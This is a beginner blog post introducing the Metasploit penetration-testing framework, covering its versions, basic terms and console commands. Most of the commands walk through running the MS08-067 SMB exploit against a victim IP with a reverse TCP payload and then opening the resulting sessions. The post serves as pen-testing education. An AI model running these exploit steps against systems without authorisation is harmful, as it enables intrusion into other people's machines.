Metasploit Pen Testing Software

Pen testing software metasploit. Metasploit framework it is an open source software for penetration testing. Which is used for developing and executing exploit code against a remote target system.

Download Metasploit

Penetration testing world for hackers if you are new to penetration testing then we’d certainly recommends metasploit framework. Metasploit is a framework and it is not a specific application it means the users of metasploit can create their own exploits for testing the systems loop holes. Metasploit Version’s Metasploit released several versions of metasploit both freeware and Premium. But for new learners the free version works just great.

metasploit logo pen testing


Metasploit Framework

Framework is available for both windows and Linux but we recommend that you to learn it in any Linux distro or any Linux environment. The premium version of metasploit framework is of $5,000. The pro version is aimed at the professional pen tester. By the Way the cost $5,000 is price per year per user. If you are using Metasploit Framework you must understand these terms:

  1. System exploitation :- You are trying to exploit a vulnerability in a system, machine or any network.
  2. Payload :- It is the actual code which runs on the target system after exploitation.
  3. Listening :- Listening to incoming connections.
  4. Vulnerability :- Loop hole which is used to break or compromise a system’s security.
  5. Exploit :- These are the codes which allows any pen tester to take advantage of a vulnerable system.

You may also like :- Hack Windows XP using Armitage Kali Linux

Some commands of Metasploit Framework Pen Testing

For starting of metasploit type msfconsole on your terminal. It is also available for GUI mode or Graphical user interface for this type msfgui on your terminal.

For Help type msfconsole –h (it gives the basic idea about the usage of metasploit)

For msfconsole help just type help

Connect command it is the alternative of telnet and ncat in metasploit.

Connect –s 443

Ping Command :- ping

Show exploit command :- show exploits

Show payloads command :- show payloads

Info command :- info <exploit> or info <payload>

Use command :- use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > show options To show available options

msf exploit(ms08_067_netapi) > set rhost → To set remote IP (victim IP) msf exploit(ms08_067_netapi) > set lhost → To set local IP (attacker IP) msf exploit(ms08_067_netapi) > set rport 445 → To set port number of remote host

msf exploit(ms08_067_netapi) > set lport 443 → To set port number of local host

msf exploit(ms08_067_netapi) > set payload windows/vncinject/reverse_tcp_dns → Tp set payload

msf exploit(ms08_067_netapi) > unset rhost → To remove rhost

msf exploit(ms08_067_netapi) > unset lhost → To remove local host

msf exploit(ms08_067_netapi) > exploit → To execute exploit

msf exploit(ms08_067_netapi) > back → To go back on the main window

msf exploit(ms08_067_netapi) > sessions -l → To check any active session

msf exploit(ms08_067_netapi) > sessions -i ID → To go on a active session ID must be numeric number

Written by

Raven Adler

Dropout of engineering now working as a full-time blogger. Her areas of Interest are Computers, Programming, and Blogging. At HackBS she writes articles related to Apps, Networking, Ethical hacking and cyber security.

Leave a Reply